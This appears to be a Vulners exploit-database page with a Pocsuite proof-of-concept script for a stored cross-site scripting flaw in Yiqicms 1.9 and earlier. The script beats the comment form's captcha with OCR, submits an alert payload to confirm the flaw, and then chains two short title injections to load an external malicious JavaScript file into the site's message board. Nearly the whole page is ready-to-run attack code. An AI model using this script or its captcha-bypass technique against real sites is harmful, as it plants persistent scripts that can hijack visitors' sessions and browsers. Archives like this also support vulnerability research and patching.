Vulners
Lucene search
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
import pytesseract
from PIL import Image
import re
class TestPOC(POCBase):
vulID = '89295' # vul ID
version = '1'
author = 'Jim叔叔'
vulDate = '2014-12-30'
createDate = '2015-10-03'
updateDate = '2015-10-03'
references = ['http://www.wooyun.org/bugs/wooyun-2010-080038']
name = 'Yiqicms 存储型XSS '
appPowerLink = 'http://www.yiqicms.com/'
appName = 'Yiqicms'
appVersion = '<=1.9'
vulType = 'XSS'
desc = '''
易企cms存在存储型XSS,网站留言部分只对用户输入进行长度校验,并没有filter掉可能的script输入,导致攻击者可以注入恶意js脚本。
input_message_and_validate函数主要是通过PIL完成验证码图片的分析和提交,能够保证最终提交的表单验证码是正确的。
由于标题输入处要求小于30个字符,为了能够引入第三方恶意脚本,需通过两次注入来完成(exp)。
'''
# the sample sites for examine
samples = ['']
def input_message_and_validate(self, title):
pattern = '^[a-zA-Z0-9]{4}$'
regex = re.compile(pattern)
while 1:
req_handler = req.Session()
validate = self.url + '/captcha/captcha.php'
f = open("1.jpg","wb")
pic = req_handler.get(validate).content
f.write(pic)
f.close()
image = Image.open('1.jpg')
validate_code = pytesseract.image_to_string(image).replace(' ', '')
re_result = regex.match(validate_code)
if re_result:
f_save = open("2.jpg","wb")
f_save.write(pic)
f_save.close()
print validate_code
payload = {
'msgtitle':title,
'msgname':'1234',
'msgcontact':'1234',
'msgcontent':'1234',
'capcode':validate_code,
'action':'save'
}
target_url = self.url + '/comment.php'
response = req_handler.post(data=payload,url=target_url)
content = response.content
#验证码错误
if '\351\252\214\350\257\201\347\240\201\351\224\231\350\257\257,' in content:
continue
#验证码正确
else:
return content
def _verify(self):
result = {}
content = self.input_message_and_validate('<script>alert(1)</script>')
#留言添加成功
if '\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content:
result['XSSInfo'] = {}
result['XSSInfo']['URL'] = self.url + '/comment.php'
result['XSSInfo']['Payload'] = '<script>alert(1)</script>'
return self.parse_result(result)
def _attack(self):
#分两次注入
result = {}
content_first = self.input_message_and_validate('*/</script>')
#src还可以有13个字节,域名和js文件名都得短,xxxx应为恶意js脚本
content_last = self.input_message_and_validate('<script src="xxxx.js">/*')
if ('\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content_first) and \
('\347\225\231\350\250\200\346\267\273\345\212\240\346\210\220\345\212\237' in content_last):
result['XSSInfo'] = {}
result['XSSInfo']['URL'] = self.url + '/comment.php'
result['XSSInfo']['Payload'] = '<script src="xxxx.js"></script>'
return self.parse_result(result)
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
register(TestPOC)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Sep 2015 00:00Current
7.1High risk
Vulners AI Score7.1